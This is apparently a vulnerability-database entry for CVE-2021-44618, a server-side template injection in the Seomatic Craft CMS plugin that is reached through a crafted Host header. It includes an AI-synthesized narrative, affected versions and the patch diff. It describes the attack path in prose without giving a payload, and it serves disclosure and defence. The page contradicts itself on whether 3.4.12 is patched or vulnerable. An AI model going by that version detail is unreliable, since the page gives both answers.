CVE-2021-44618
Description
A Server-side Template Injection (SSTI) vulnerability in Seomatic 3.4.12 allows attackers to execute arbitrary code via a crafted host header.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A Server-side Template Injection (SSTI) vulnerability in Seomatic 3.4.12 allows attackers to execute arbitrary code via a crafted host header.
Vulnerability
A Server-side Template Injection (SSTI) vulnerability exists in Nystudio107 Seomatic 3.4.12, a Craft CMS plugin. The flaw resides in the src/helpers/UrlHelper.php file, where the siteUrl and absoluteUrlWithProtocol functions fail to sanitize URL components derived from the Host HTTP header. An attacker can inject Twig template syntax into the host header, which is then processed by the server without proper escaping [1][2].
Exploitation
An attacker can exploit this vulnerability by sending an HTTP request to a Craft CMS site running the vulnerable plugin with a crafted Host header containing a malicious Twig template payload. No authentication is required, and the attack can be performed remotely over the network. The server processes the injected template code during URL generation, leading to server-side template execution [1][3].
Impact
Successful exploitation allows the attacker to achieve remote code execution (RCE) on the server. The attacker can execute arbitrary Twig templates, which in Craft CMS can lead to complete compromise of the application, including data exfiltration, privilege escalation, and persistent backdoor installation [1][3].
Mitigation
The vulnerability is fixed in commit 0c5c0c0e0cb61000d12ec55ebf174745a5bf6469, which applies DynamicMeta::sanitizeUrl() to the output of the affected functions [4]. Users should upgrade to a version of the plugin that includes this patch; as of the publication date, the latest stable release (3.4.12) is vulnerable, so applying the commit or updating to any subsequent release is recommended. No workaround is documented [2][4].
- NVD - CVE-2021-44618
- Release Version 3.4.12 · nystudio107/craft-seomatic
- GitHub - nystudio107/craft-seomatic: SEOmatic facilitates modern SEO best practices & implementation for Craft CMS 3. It is a turnkey SEO system that is comprehensive, powerful, and flexible.
- Sanitize all URLs · nystudio107/craft-seomatic@0c5c0c0
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
nystudio107/craft-seomaticPackagist | < 3.4.12 | 3.4.12 |
Affected products
2- Nystudio107/Seomaticdescription
Patches
10c5c0c0e0cb6Sanitize all URLs
1 file changed · +2 −2
src/helpers/UrlHelper.php+2 −2 modified@@ -56,7 +56,7 @@ public static function siteUrl(string $path = '', $params = null, string $scheme return $url; } - return parent::siteUrl($path, $params, $scheme, $siteId); + return DynamicMeta::sanitizeUrl(parent::siteUrl($path, $params, $scheme, $siteId)); } /** @@ -130,7 +130,7 @@ public static function absoluteUrlWithProtocol($url): string $url = rtrim($url, '/'); } - return $url; + return DynamicMeta::sanitizeUrl($url); } /**
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4- github.com/advisories/GHSA-m3xv-x3ph-mq22ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2021-44618ghsaADVISORY
- github.com/nystudio107/craft-seomatic/commit/0c5c0c0e0cb61000d12ec55ebf174745a5bf6469ghsax_refsource_MISCWEB
- github.com/nystudio107/craft-seomatic/releases/tag/3.4.12ghsax_refsource_MISCWEB
News mentions
0No linked articles in our index yet.